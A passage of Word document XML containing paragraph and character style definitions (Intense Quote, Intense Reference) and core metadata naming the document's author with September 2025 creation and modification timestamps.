      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00304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E1C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00304E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Hernandez tellez</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sebastian Hernandez tellez</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-01T03:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-01T03:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>